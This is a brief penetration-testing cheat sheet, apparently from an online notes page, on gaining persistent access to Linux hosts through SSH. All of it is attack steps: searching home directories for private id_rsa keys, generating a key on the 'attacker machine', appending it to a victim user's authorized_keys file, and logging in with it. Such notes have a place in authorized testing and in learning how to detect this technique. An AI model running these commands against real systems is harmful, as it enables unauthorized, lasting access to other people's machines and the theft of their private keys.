Persistence
Search for SSH key
find /home/ -name "id_rsa"Linux persistence with SSH
Generate SSH Key in attacker machine:
ssh-keygen && xclip -selection clipboard ~/.ssh/id_rsa.pubVictim Machine
echo "<paste ssh key>" >> /home/<user>/.ssh/authorized_keysLogin with SSH Key
ssh <username>@<hostname>Last updated